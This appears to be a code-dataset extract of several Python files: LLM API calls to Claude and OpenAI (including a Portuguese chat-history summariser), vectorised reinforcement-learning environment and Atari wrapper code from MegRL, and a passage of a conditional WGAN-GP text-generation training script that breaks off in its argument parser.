api_key = os.environ.get("ANTHROPIC_API_KEY")
anthropic = Anthropic(
# defaults to os.environ.get("ANTHROPIC_API_KEY")
api_key = api_key,
)
completion = anthropic.completions.create(
model="claude-2",
max_tokens_to_sample=90000,
prompt=f"{HUMAN_PROMPT} {prompt_txt} {AI_PROMPT}",
)
return completion.completion
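
# Example usage (illustrative only; assumes ANTHROPIC_API_KEY is set in the
# environment or in a .env file):
#
#   print(call_claude("Summarize this paragraph: ..."))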
| [
"PLACEHOLDER PLACEHOLDER PLACEHOLDER"
] |
2024-01-10 | HeitorLouzeiro/chatbot-django-chatgpt | chatbot~views~resumidor.py | import os
import dotenv
from openai import OpenAI
dotenv.load_dotenv()
# Set OpenAI API key
api_key = os.environ.get('OPENAI_API_KEY')
client = OpenAI(api_key=api_key)
def resumidor_de_historico(historico):
resposta_resumidor = client.chat.completions.create(
model='gpt-3.5-turbo',
messages=[
{
"role": "user",
"content": f"""
Resumir progressivamente as linhas de conversa fornecidas,
acrescentando ao resumo anterior e retornando um novo resumo.
Não apague nenhum assunto da conversa.
Se não houver resumo, apenas continue a conversa normalmente.
## EXEMPLO:
O usuario pergunta o que a IA pensa
sobre a inteligência artificial.
A IA acredita que a inteligência artificial é uma força para o bem.
Usuário: Por que você acha que a inteligência artificial
é uma força para o bem?
IA: Porque a inteligência artificial ajudará os humanos
a alcançarem seu pleno potencial.
### Novo resumo:
O usuario questiona a razão pela qual a
IA considera a inteligência artificial
uma força para o bem, e a IA responde que
é porque a inteligência artificial
ajudará os humanos a atingirem seu pleno potencial.
## FIM DO EXEMPLO
Resumo atual:
""" + historico + """
Novo resumo:"""
}
],
temperature=1,
max_tokens=256,
top_p=1,
frequency_penalty=0,
presence_penalty=0
)
return resposta_resumidor
def criando_resumo(historico):
resposta = resumidor_de_historico(historico=historico)
resumo = resposta.choices[0].message.content
return resumo
| [
"\n Resumir progressivamente as linhas de conversa fornecidas,\n acrescentando ao resumo anterior e retornando um novo resumo.\n Não apague nenhum assunto da conversa.\n Se não houver resumo, apenas continue a conversa normalmente.\n\n ## EXEMPLO:\n O usuario pergunta o que a IA pensa\n sobre a inteligência artificial.\n A IA acredita que a inteligência artificial é uma força para o bem.\n Usuário: Por que você acha que a inteligência artificial\n é uma força para o bem?\n IA: Porque a inteligência artificial ajudará os humanos\n a alcançarem seu pleno potencial.\n\n ### Novo resumo:\n O usuario questiona a razão pela qual a\n IA considera a inteligência artificial\n uma força para o bem, e a IA responde que\n é porque a inteligência artificial\n ajudará os humanos a atingirem seu pleno potencial.\n\n ## FIM DO EXEMPLO \n Resumo atual:\n PLACEHOLDER\n Novo resumo:"
] |
2024-01-10 | MegEngine/MegRL | baserl~data~env~venvs.py | from typing import Any, Callable, List, Optional, Tuple, Union
import gymnasium as gym
import numpy as np
from baserl.data.env.worker import (
DummyEnvWorker,
EnvWorker,
)
from baserl.utils import RunningMeanStd
class BaseVectorEnv(gym.Env):
"""Base class for vectorized environments wrapper.
Usage:
::
env_num = 8
envs = DummyVectorEnv([lambda: gym.make(task) for _ in range(env_num)])
assert len(envs) == env_num
It accepts a list of environment generators. In other words, an environment
generator ``efn`` of a specific task means that ``efn()`` returns the
environment of the given task, for example, ``gym.make(task)``.
All of the VectorEnv must inherit :class:`~tianshou.env.BaseVectorEnv`.
Here are some other usages:
::
envs.seed(2) # which is equal to the next line
envs.seed([2, 3, 4, 5, 6, 7, 8, 9]) # set specific seed for each env
obs = envs.reset() # reset all environments
obs = envs.reset([0, 5, 7]) # reset 3 specific environments
        obs, rew, terminated, truncated, info = envs.step([1] * 8)  # step synchronously
envs.render() # render all environments
envs.close() # close all environments
.. warning::
If you use your own environment, please make sure the ``seed`` method
is set up properly, e.g.,
::
def seed(self, seed):
np.random.seed(seed)
Otherwise, the outputs of these envs may be the same with each other.
:param env_fns: a list of callable envs, ``env_fns[i]()`` generates the i-th env.
:param worker_fn: a callable worker, ``worker_fn(env_fns[i])`` generates a
worker which contains the i-th env.
:param int wait_num: use in asynchronous simulation if the time cost of
``env.step`` varies with time and synchronously waiting for all
environments to finish a step is time-wasting. In that case, we can
return when ``wait_num`` environments finish a step and keep on
simulation in these environments. If ``None``, asynchronous simulation
is disabled; else, ``1 <= wait_num <= env_num``.
:param float timeout: use in asynchronous simulation same as above, in each
vectorized step it only deal with those environments spending time
within ``timeout`` seconds.
:param bool norm_obs: Whether to track mean/std of data and normalize observation
on return. For now, observation normalization only support observation of
type np.ndarray.
:param obs_rms: class to track mean&std of observation. If not given, it will
initialize a new one. Usually in envs that is used to evaluate algorithm,
obs_rms should be passed in. Default to None.
:param bool update_obs_rms: Whether to update obs_rms. Default to True.
"""
def __init__(
self,
env_fns: List[Callable[[], gym.Env]],
worker_fn: Callable[[Callable[[], gym.Env]], EnvWorker],
wait_num: Optional[int] = None,
timeout: Optional[float] = None,
norm_obs: bool = False,
obs_rms: Optional[RunningMeanStd] = None,
update_obs_rms: bool = True,
seed: int = None,
) -> None:
self._env_fns = env_fns
# A VectorEnv contains a pool of EnvWorkers, which corresponds to
# interact with the given envs (one worker <-> one env).
if seed is None:
self.workers = [worker_fn(fn) for i, fn in enumerate(env_fns)]
else:
self.workers = [worker_fn(fn, seed=i+seed) for i, fn in enumerate(env_fns)]
self.worker_class = type(self.workers[0])
assert issubclass(self.worker_class, EnvWorker)
assert all([isinstance(w, self.worker_class) for w in self.workers])
self.env_num = len(env_fns)
self.wait_num = wait_num or len(env_fns)
assert 1 <= self.wait_num <= len(env_fns), \
f"wait_num should be in [1, {len(env_fns)}], but got {wait_num}"
self.timeout = timeout
assert self.timeout is None or self.timeout > 0, \
f"timeout is {timeout}, it should be positive if provided!"
self.is_async = self.wait_num != len(env_fns) or timeout is not None
self.waiting_conn: List[EnvWorker] = []
# environments in self.ready_id is actually ready
# but environments in self.waiting_id are just waiting when checked,
# and they may be ready now, but this is not known until we check it
# in the step() function
self.waiting_id: List[int] = []
# all environments are ready in the beginning
self.ready_id = list(range(self.env_num))
self.is_closed = False
# initialize observation running mean/std
self.norm_obs = norm_obs
self.update_obs_rms = update_obs_rms
self.obs_rms = RunningMeanStd() if obs_rms is None and norm_obs else obs_rms
self.__eps = np.finfo(np.float32).eps.item()
def _assert_is_not_closed(self) -> None:
assert not self.is_closed, \
f"Methods of {self.__class__.__name__} cannot be called after close."
def __len__(self) -> int:
"""Return len(self), which is the number of environments."""
return self.env_num
def __getattribute__(self, key: str) -> Any:
"""Switch the attribute getter depending on the key.
Any class who inherits ``gym.Env`` will inherit some attributes, like
``action_space``. However, we would like the attribute lookup to go straight
into the worker (in fact, this vector env's action_space is always None).
"""
if key in [
'metadata', 'reward_range', 'spec', 'action_space', 'observation_space'
]: # reserved keys in gym.Env
return self.get_env_attr(key)
else:
return super().__getattribute__(key)
def get_env_attr(
self,
key: str,
id: Optional[Union[int, List[int], np.ndarray]] = None
) -> List[Any]:
"""Get an attribute from the underlying environments.
If id is an int, retrieve the attribute denoted by key from the environment
underlying the worker at index id. The result is returned as a list with one
element. Otherwise, retrieve the attribute for all workers at indices id and
return a list that is ordered correspondingly to id.
:param str key: The key of the desired attribute.
:param id: Indice(s) of the desired worker(s). Default to None for all env_id.
:return list: The list of environment attributes.
"""
self._assert_is_not_closed()
id = self._wrap_id(id)
if self.is_async:
self._assert_id(id)
return [self.workers[j].get_env_attr(key) for j in id]
def set_env_attr(
self,
key: str,
value: Any,
id: Optional[Union[int, List[int], np.ndarray]] = None
) -> None:
"""Set an attribute in the underlying environments.
If id is an int, set the attribute denoted by key from the environment
underlying the worker at index id to value.
Otherwise, set the attribute for all workers at indices id.
:param str key: The key of the desired attribute.
:param Any value: The new value of the attribute.
:param id: Indice(s) of the desired worker(s). Default to None for all env_id.
"""
self._assert_is_not_closed()
id = self._wrap_id(id)
if self.is_async:
self._assert_id(id)
for j in id:
self.workers[j].set_env_attr(key, value)
def _wrap_id(
self,
id: Optional[Union[int, List[int], np.ndarray]] = None
) -> Union[List[int], np.ndarray]:
if id is None:
return list(range(self.env_num))
return [id] if np.isscalar(id) else id # type: ignore
def _assert_id(self, id: Union[List[int], np.ndarray]) -> None:
for i in id:
assert i not in self.waiting_id, \
f"Cannot interact with environment {i} which is stepping now."
assert i in self.ready_id, \
f"Can only interact with ready environments {self.ready_id}."
def reset(
self,
id: Optional[Union[int, List[int], np.ndarray]] = None,
**kwargs: Any,
) -> Tuple[np.ndarray, Union[dict, List[dict]]]:
"""Reset the state of some envs and return initial observations.
If id is None, reset the state of all the environments and return
initial observations, otherwise reset the specific environments with
the given id, either an int or a list.
"""
self._assert_is_not_closed()
id = self._wrap_id(id)
if self.is_async:
self._assert_id(id)
# send(None) == reset() in worker
for i in id:
self.workers[i].send(None, **kwargs)
ret_list = [self.workers[i].recv() for i in id]
assert (
isinstance(ret_list[0], (tuple, list)) and len(ret_list[0]) == 2
and isinstance(ret_list[0][1], dict)
)
obs_list = [r[0] for r in ret_list]
if isinstance(obs_list[0], tuple): # type: ignore
raise TypeError(
"Tuple observation space is not supported. ",
"Please change it to array or dict space",
)
try:
obs = np.stack(obs_list)
except ValueError: # different len(obs)
obs = np.array(obs_list, dtype=object)
infos = [r[1] for r in ret_list]
return obs, infos # type: ignore
def step(
self,
action: np.ndarray,
id: Optional[Union[int, List[int], np.ndarray]] = None,
):
"""Run one timestep of some environments' dynamics.
If id is None, run one timestep of all the environments’ dynamics;
otherwise run one timestep for some environments with given id, either
an int or a list. When the end of episode is reached, you are
responsible for calling reset(id) to reset this environment’s state.
Accept a batch of action and return a tuple (batch_obs, batch_rew,
batch_done, batch_info) in numpy format.
:param numpy.ndarray action: a batch of action provided by the agent.
:return: A tuple consisting of either:
* ``obs`` a numpy.ndarray, the agent's observation of current environments
* ``rew`` a numpy.ndarray, the amount of rewards returned after \
previous actions
* ``terminated`` a numpy.ndarray, whether these episodes have been \
terminated
* ``truncated`` a numpy.ndarray, whether these episodes have been truncated
* ``info`` a numpy.ndarray, contains auxiliary diagnostic \
information (helpful for debugging, and sometimes learning)
For the async simulation:
Provide the given action to the environments. The action sequence
should correspond to the ``id`` argument, and the ``id`` argument
should be a subset of the ``env_id`` in the last returned ``info``
(initially they are env_ids of all the environments). If action is
None, fetch unfinished step() calls instead.
"""
self._assert_is_not_closed()
id = self._wrap_id(id)
if not self.is_async:
assert len(action) == len(id)
for i, j in enumerate(id):
self.workers[j].send(action[i])
result = []
for j in id:
env_return = self.workers[j].recv()
env_return[-1]["env_id"] = j
result.append(env_return)
else:
if action is not None:
self._assert_id(id)
assert len(action) == len(id)
for act, env_id in zip(action, id):
self.workers[env_id].send(act)
self.waiting_conn.append(self.workers[env_id])
self.waiting_id.append(env_id)
self.ready_id = [x for x in self.ready_id if x not in id]
ready_conns: List[EnvWorker] = []
while not ready_conns:
ready_conns = self.worker_class.wait(
self.waiting_conn, self.wait_num, self.timeout
)
result = []
for conn in ready_conns:
waiting_index = self.waiting_conn.index(conn)
self.waiting_conn.pop(waiting_index)
env_id = self.waiting_id.pop(waiting_index)
# env_return can be (obs, reward, done, info) or
# (obs, reward, terminated, truncated, info)
env_return = conn.recv()
env_return[-1]["env_id"] = env_id # Add `env_id` to info
result.append(env_return)
self.ready_id.append(env_id)
obs_list, rew_list, term_list, trunc_list, info_list = tuple(zip(*result))
try:
obs_stack = np.stack(obs_list)
except ValueError: # different len(obs)
obs_stack = np.array(obs_list, dtype=object)
return (
obs_stack,
np.stack(rew_list),
np.stack(term_list),
np.stack(trunc_list),
np.stack(info_list),
)
def seed(
self,
seed: Optional[Union[int, List[int]]] = None
) -> List[Optional[List[int]]]:
"""Set the seed for all environments.
Accept ``None``, an int (which will extend ``i`` to
``[i, i + 1, i + 2, ...]``) or a list.
:return: The list of seeds used in this env's random number generators.
The first value in the list should be the "main" seed, or the value
which a reproducer pass to "seed".
"""
self._assert_is_not_closed()
seed_list: Union[List[None], List[int]]
if seed is None:
seed_list = [seed] * self.env_num
elif isinstance(seed, int):
seed_list = [seed + i for i in range(self.env_num)]
else:
seed_list = seed
return [w.seed(s) for w, s in zip(self.workers, seed_list)]
def render(self, **kwargs: Any) -> List[Any]:
"""Render all of the environments."""
self._assert_is_not_closed()
if self.is_async and len(self.waiting_id) > 0:
raise RuntimeError(
f"Environments {self.waiting_id} are still stepping, cannot "
"render them now."
)
return [w.render(**kwargs) for w in self.workers]
def close(self) -> None:
"""Close all of the environments.
This function will be called only once (if not, it will be called during
garbage collected). This way, ``close`` of all workers can be assured.
"""
self._assert_is_not_closed()
for w in self.workers:
w.close()
self.is_closed = True
def normalize_obs(self, obs: np.ndarray) -> np.ndarray:
"""Normalize observations by statistics in obs_rms."""
if self.obs_rms and self.norm_obs:
clip_max = 10.0 # this magic number is from openai baselines
# see baselines/common/vec_env/vec_normalize.py#L10
obs = (obs - self.obs_rms.mean) / np.sqrt(self.obs_rms.var + self.__eps)
obs = np.clip(obs, -clip_max, clip_max)
return obs
class DummyVectorEnv(BaseVectorEnv):
"""Dummy vectorized environment wrapper, implemented in for-loop.
"""
def __init__(self, env_fns: List[Callable[[], gym.Env]], **kwargs: Any) -> None:
super().__init__(env_fns, DummyEnvWorker, **kwargs)
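
# Minimal usage sketch (illustrative, mirroring the class docstring); it assumes
# gymnasium's CartPole-v1 is installed and that DummyEnvWorker follows the
# gymnasium reset/step API used throughout this module.
if __name__ == "__main__":
    envs = DummyVectorEnv([lambda: gym.make("CartPole-v1") for _ in range(2)])
    obs, infos = envs.reset()
    obs, rew, term, trunc, info = envs.step(np.array([0, 1]))
    envs.close()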
| [] |
2024-01-10 | MegEngine/MegRL | baserl~data~env~wrapper.py | # https://github.com/thu-ml/tianshou/blob/master/examples/atari/atari_wrapper.py
# Borrow a lot from openai baselines:
# https://github.com/openai/baselines/blob/master/baselines/common/atari_wrappers.py
import warnings
from collections import deque
import cv2
import gymnasium as gym
import numpy as np
def _parse_reset_result(reset_result):
contains_info = (
isinstance(reset_result, tuple) and len(reset_result) == 2
and isinstance(reset_result[1], dict)
)
if contains_info:
return reset_result[0], reset_result[1], contains_info
return reset_result, {}, contains_info
class NoopResetEnv(gym.Wrapper):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
:param gym.Env env: the environment to wrap.
:param int noop_max: the maximum value of no-ops to run.
"""
def __init__(self, env, noop_max=30):
super().__init__(env)
self.noop_max = noop_max
self.noop_action = 0
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def reset(self, **kwargs):
_, info, return_info = _parse_reset_result(self.env.reset(**kwargs))
if hasattr(self.unwrapped.np_random, "integers"):
noops = self.unwrapped.np_random.integers(1, self.noop_max + 1)
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1)
for _ in range(noops):
step_result = self.env.step(self.noop_action)
if len(step_result) == 4:
obs, rew, done, info = step_result
else:
obs, rew, term, trunc, info = step_result
done = term or trunc
if done:
obs, info, _ = _parse_reset_result(self.env.reset())
if return_info:
return obs, info
return obs
class MaxAndSkipEnv(gym.Wrapper):
"""Return only every `skip`-th frame (frameskipping) using most recent raw
observations (for max pooling across time steps)
:param gym.Env env: the environment to wrap.
:param int skip: number of `skip`-th frame.
"""
def __init__(self, env, skip=4):
super().__init__(env)
self._skip = skip
def step(self, action):
"""Step the environment with the given action. Repeat action, sum
reward, and max over last observations.
"""
obs_list, total_reward = [], 0.
new_step_api = False
for _ in range(self._skip):
step_result = self.env.step(action)
if len(step_result) == 4:
obs, reward, done, info = step_result
else:
obs, reward, term, trunc, info = step_result
done = term or trunc
new_step_api = True
obs_list.append(obs)
total_reward += reward
if done:
break
max_frame = np.max(obs_list[-2:], axis=0)
if new_step_api:
return max_frame, total_reward, term, trunc, info
return max_frame, total_reward, done, info
class EpisodicLifeEnv(gym.Wrapper):
"""Make end-of-life == end-of-episode, but only reset on true game over. It
helps the value estimation.
:param gym.Env env: the environment to wrap.
"""
def __init__(self, env):
super().__init__(env)
self.lives = 0
self.was_real_done = True
self._return_info = False
def step(self, action):
step_result = self.env.step(action)
if len(step_result) == 4:
obs, reward, done, info = step_result
new_step_api = False
else:
obs, reward, term, trunc, info = step_result
done = term or trunc
new_step_api = True
self.was_real_done = done
# check current lives, make loss of life terminal, then update lives to
# handle bonus lives
lives = self.env.unwrapped.ale.lives()
if 0 < lives < self.lives:
# for Qbert sometimes we stay in lives == 0 condition for a few
# frames, so its important to keep lives > 0, so that we only reset
# once the environment is actually done.
done = True
term = True
self.lives = lives
if new_step_api:
return obs, reward, term, trunc, info
return obs, reward, done, info
def reset(self, **kwargs):
"""Calls the Gym environment reset, only when lives are exhausted. This
way all states are still reachable even though lives are episodic, and
the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs, info, self._return_info = _parse_reset_result(
self.env.reset(**kwargs)
)
else:
# no-op step to advance from terminal/lost life state
step_result = self.env.step(0)
obs, info = step_result[0], step_result[-1]
self.lives = self.env.unwrapped.ale.lives()
if self._return_info:
return obs, info
else:
return obs
class FireResetEnv(gym.Wrapper):
"""Take action on reset for environments that are fixed until firing.
Related discussion: https://github.com/openai/baselines/issues/240
:param gym.Env env: the environment to wrap.
"""
def __init__(self, env):
super().__init__(env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def reset(self, **kwargs):
_, _, return_info = _parse_reset_result(self.env.reset(**kwargs))
obs = self.env.step(1)[0]
return (obs, {}) if return_info else obs
class WarpFrame(gym.ObservationWrapper):
"""Warp frames to 84x84 as done in the Nature paper and later work.
:param gym.Env env: the environment to wrap.
"""
def __init__(self, env):
super().__init__(env)
self.size = 84
self.observation_space = gym.spaces.Box(
low=np.min(env.observation_space.low),
high=np.max(env.observation_space.high),
shape=(self.size, self.size),
dtype=env.observation_space.dtype
)
def observation(self, frame):
"""returns the current observation from a frame"""
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
return cv2.resize(frame, (self.size, self.size), interpolation=cv2.INTER_AREA)
class ScaledFloatFrame(gym.ObservationWrapper):
"""Normalize observations to 0~1.
:param gym.Env env: the environment to wrap.
"""
def __init__(self, env):
super().__init__(env)
low = np.min(env.observation_space.low)
high = np.max(env.observation_space.high)
self.bias = low
self.scale = high - low
self.observation_space = gym.spaces.Box(
low=0., high=1., shape=env.observation_space.shape, dtype=np.float32
)
def observation(self, observation):
return (observation - self.bias) / self.scale
class ClipRewardEnv(gym.RewardWrapper):
"""clips the reward to {+1, 0, -1} by its sign.
:param gym.Env env: the environment to wrap.
"""
def __init__(self, env):
super().__init__(env)
self.reward_range = (-1, 1)
def reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign. Note: np.sign(0) == 0."""
return np.sign(reward)
class FrameStack(gym.Wrapper):
"""Stack n_frames last frames.
:param gym.Env env: the environment to wrap.
:param int n_frames: the number of frames to stack.
"""
def __init__(self, env, n_frames):
super().__init__(env)
self.n_frames = n_frames
self.frames = deque([], maxlen=n_frames)
shape = (n_frames, ) + env.observation_space.shape
self.observation_space = gym.spaces.Box(
low=np.min(env.observation_space.low),
high=np.max(env.observation_space.high),
shape=shape,
dtype=env.observation_space.dtype
)
def reset(self, **kwargs):
obs, info, return_info = _parse_reset_result(self.env.reset(**kwargs))
for _ in range(self.n_frames):
self.frames.append(obs)
return (self._get_ob(), info) if return_info else self._get_ob()
def step(self, action):
step_result = self.env.step(action)
if len(step_result) == 4:
obs, reward, done, info = step_result
new_step_api = False
else:
obs, reward, term, trunc, info = step_result
new_step_api = True
self.frames.append(obs)
if new_step_api:
return self._get_ob(), reward, term, trunc, info
return self._get_ob(), reward, done, info
def _get_ob(self):
# the original wrapper use `LazyFrames` but since we use np buffer,
# it has no effect
return np.stack(self.frames, axis=0)
def wrap_deepmind(
env_id,
episode_life=True,
clip_rewards=True,
frame_stack=4,
scale=False,
warp_frame=True
):
"""Configure environment for DeepMind-style Atari. The observation is
channel-first: (c, h, w) instead of (h, w, c).
:param str env_id: the atari environment id.
:param bool episode_life: wrap the episode life wrapper.
:param bool clip_rewards: wrap the reward clipping wrapper.
:param int frame_stack: wrap the frame stacking wrapper.
:param bool scale: wrap the scaling observation wrapper.
:param bool warp_frame: wrap the grayscale + resize observation wrapper.
:return: the wrapped atari environment.
"""
assert 'NoFrameskip' in env_id
env = gym.make(env_id, render_mode="rgb_array")
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
if episode_life:
env = EpisodicLifeEnv(env)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
if warp_frame:
env = WarpFrame(env)
if scale:
env = ScaledFloatFrame(env)
if clip_rewards:
env = ClipRewardEnv(env)
if frame_stack:
env = FrameStack(env, frame_stack)
return env
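
# Illustrative usage (not part of the original module); assumes the gymnasium
# Atari extras and the Pong ROM are installed locally.
if __name__ == "__main__":
    env = wrap_deepmind("PongNoFrameskip-v4")
    reset_result = env.reset()
    first_obs = reset_result[0] if isinstance(reset_result, tuple) else reset_result
    print(np.asarray(first_obs).shape)  # expected: (4, 84, 84) stacked grayscale frames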
| [] |
2024-01-10 | Egojr/optagan | optagan~cond_wgan_gp_train.py | from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import logging
import torch
import torch.nn as nn
import torch.optim as optim
import torch.autograd as autograd
from torch.autograd import Variable
import numpy as np
from modules.gan import cond_Generator, cond_Critic, Classifier
import glob
import os
import pickle
import random
import torch.nn.functional as F
from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from tqdm import tqdm, trange
from func import GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig, BertConfig
from func import GPT2LMHeadModel, GPT2Tokenizer, GPT2ForLatentConnector
from func import OpenAIGPTLMHeadModel, OpenAIGPTTokenizer
from func import XLNetLMHeadModel, XLNetTokenizer
from func import TransfoXLLMHeadModel, TransfoXLTokenizer
from func import BertForLatentConnector, BertTokenizer
from collections import defaultdict
from utils import (TextDataset_Split, TextDataset_2Tokenizers, BucketingDataLoader, BucketingDataLoaderYelp)
import pdb
from modules.utils import (calc_blue_parallel_func, pad_seq, rollout, rollout_test)
from transformers.modeling_utils import top_k_top_p_filtering
MAX_LENGTH = int(10000) # Hardcoded max length to avoid infinite loop
ALL_MODELS = sum((tuple(conf.pretrained_config_archive_map.keys()) for conf in (GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig)), ())
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
MODEL_CLASSES = {
'gpt2': (GPT2Config, GPT2ForLatentConnector, GPT2Tokenizer),
'bert': (BertConfig, BertForLatentConnector, BertTokenizer)
}
def load_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
dataset = TextDataset_2Tokenizers(tokenizer, args, args.train_data_file, block_size=args.block_size)
else:
dataset = TextDataset_Split(tokenizer, args, args.train_data_file, block_size=args.block_size)
return dataset
def build_dataload_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
args.batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
file_path=args.train_data_file
dataloader = BucketingDataLoaderYelp(file_path, args.batch_size, args.max_seq_length, tokenizer, args, bucket=100, shuffle=True)
else:
pass
return dataloader
def compute_grad_penalty(critic, real_data, fake_data, label): #
B = real_data.size(0)
alpha = torch.FloatTensor(np.random.random((B, 1)))
if args.cuda:
alpha = alpha.cuda()
sample = alpha*real_data + (1-alpha)*fake_data
sample.requires_grad_(True)
score = critic(sample, label) #
outputs = torch.FloatTensor(B, 1).fill_(1.0) # args.latent_size
outputs.requires_grad_(False)
if args.cuda:
outputs = outputs.cuda()
grads = autograd.grad(
outputs=score,
inputs=sample,
grad_outputs=outputs,
create_graph=True,
retain_graph=True,
only_inputs=True
)[0]
grad_penalty = ((grads.norm(2, dim=1) - 1.) ** 2).mean()
return grad_penalty
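# compute_grad_penalty implements the WGAN-GP gradient penalty: the critic's gradient
# norm is pushed towards 1 on random interpolations between real and generated latent
# codes. Illustrative usage (a sketch, assuming `z_real`, `z_fake` of shape
# [B, latent_size] and integer labels `lab` of shape [B, 1] on the same device):
#   gp = compute_grad_penalty(critic, z_real.data, z_fake.data, lab.data)
#   c_loss = -critic(z_real, lab).mean() + critic(z_fake, lab).mean() + args.gp_lambda * gp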
def train(epoch):
model_encoder.eval()
model_decoder.eval()
generator.train()
critic.train()
classifier.train()
cl_train_loss = 0.
c_train_loss = 0.
g_train_loss = 0.
g_batches = 0
for i, x in enumerate(train_loader):
label = x[3]
x = x[0]
if args.cuda:
x = x.cuda()
# Generate noise and labels
gen_labels = (torch.rand(args.per_gpu_train_batch_size, 1) * args.n_classes).type(torch.LongTensor)
B = args.per_gpu_train_batch_size
c_optimizer.zero_grad()
noise = torch.from_numpy(np.random.normal(0, 1, (B,
args.latent_size))).float()
if args.cuda:
noise = noise.cuda()
label = label.cuda()
gen_labels = gen_labels.cuda()
# Get original text latent embeddings
with torch.no_grad():
pooled_hidden_fea = model_encoder(x, attention_mask=(x > 0).float())[1] # Paolo
mean, logvar = model_encoder.linear(pooled_hidden_fea).chunk(2, -1) # Paolo
z_real = mean.squeeze(1)
# Evaluate and get losses
z_fake = generator(noise, gen_labels)
real_score = critic(z_real, label)
fake_score = critic(z_fake, gen_labels)
grad_penalty = compute_grad_penalty(critic, z_real.data, z_fake.data, label.data) #
pred_class = classifier(z_real)
cl_lab = label.clone().squeeze_()
# Classifier loss
cl_optimizer.zero_grad()
cl_loss = nn.CrossEntropyLoss()(pred_class.to(args.device), cl_lab)
cl_train_loss += cl_loss.item()
cl_loss.backward()
cl_optimizer.step()
# Critic loss
c_loss = -torch.mean(real_score) + torch.mean(fake_score) + \
args.gp_lambda*grad_penalty
c_train_loss += c_loss.item()
c_loss.backward()
c_optimizer.step()
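# Standard WGAN schedule: the critic is updated on every batch, while the generator is
# updated once every `n_critic` critic steps (default 5 in the arguments below).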
# train generator
if i % args.n_critic == 0:
g_batches += 1
g_optimizer.zero_grad()
fake_score = critic(generator(noise, gen_labels), gen_labels) # #
pred_gen_class = classifier(generator(noise, gen_labels)).to(args.device)
cl_gen_lab = gen_labels.clone().squeeze_()
g_cl_loss = nn.CrossEntropyLoss()(pred_gen_class, cl_gen_lab)
g_loss = -torch.mean(fake_score) + g_cl_loss * 10
g_train_loss += g_loss.item()
g_loss.backward()
g_optimizer.step()
if args.interval > 0 and i % args.interval == 0:
logger.info('Epoch: {} | Batch: {}/{} ({:.0f}%) | G Loss: {:.6f} | C Loss: {:.6f} | Cl Loss: {:.6f}'.format(
epoch, args.batch_size*i, len(train_loader.dataset),
100.*(args.batch_size*i)/len(train_loader.dataset),
g_loss.item(), c_loss.item(), cl_loss.item()
))
test_lab = (torch.rand(1, 1) * args.n_classes).type(torch.LongTensor).to(args.device)
test_noise = torch.Tensor(np.random.normal(0, 1, (1, args.latent_size))).to(args.device)
test_new_z = generator(test_noise, test_lab).data
# create new sent
test_z = rollout_test(model_decoder, test_new_z, tokenizer_decoder, args.max_seq_length, 1, 0, 1)
logger.info("Label: {} | Text: {}".format(test_lab.item(), test_z))
g_train_loss /= g_batches
c_train_loss /= len(train_loader)
logger.info('* (Train) Epoch: {} | G Loss: {:.4f} | C Loss: {:.4f}'.format(
epoch, g_train_loss, c_train_loss
))
return (g_train_loss, c_train_loss)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--epochs', type=int, default=15)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gp_lambda', type=int, default=10)
parser.add_argument('--n_critic', type=int, default=5, help="Number of critic updates before each generator update")
parser.add_argument('--n_layers', type=int, default=20, help="Number of layers of generator and critic")
parser.add_argument('--block_dim', type=int, default=100)
parser.add_argument('--interval', type=int, default=10, help="Steps before logging output")
parser.add_argument('--n_classes', type=int, default=4, help="Overall number of classes")
parser.add_argument('--cuda', type=bool, default=torch.cuda.is_available())
# Optimus parameters
parser.add_argument("--train_data_file", default=None, type=str, required=True,
help="The input training data file (a text file).")
parser.add_argument("--valid_data_file", default=None, type=str, required=True,
help="The input validation data file (a text file).")
parser.add_argument("--checkpoint_dir", default=None, type=str, required=True,
help="The directory where checkpoints are saved.")
parser.add_argument('--generator_dir', default=None, type=str, help="Directory where GAN models are saved")
parser.add_argument("--output_dir", default=None, type=str, required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument("--dataset", default='Snli', type=str, help="The dataset.")
parser.add_argument("--latent_size", default=32, type=int, help="Latent space dimension.")
## Encoder options
parser.add_argument("--encoder_model_type", default="bert", type=str,
help="The encoder model architecture to be fine-tuned.")
parser.add_argument("--encoder_model_name_or_path", default="bert-base-cased", type=str,
help="The encoder model checkpoint for weights initialization.")
parser.add_argument("--encoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--encoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
## Decoder options
parser.add_argument("--decoder_model_type", default="gpt2", type=str,
help="The decoder model architecture to be fine-tuned.")
parser.add_argument("--decoder_model_name_or_path", default="bert-base-cased", type=str,
help="The decoder model checkpoint for weights initialization.")
parser.add_argument("--decoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--decoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
parser.add_argument("--per_gpu_train_batch_size", default=1, type=int,
help="Batch size per GPU/CPU for training.")
parser.add_argument("--max_seq_length", default=512, type=int,
help="Optional input sequence length before tokenization. The sequence will be dropped if it is longer the max_seq_length")
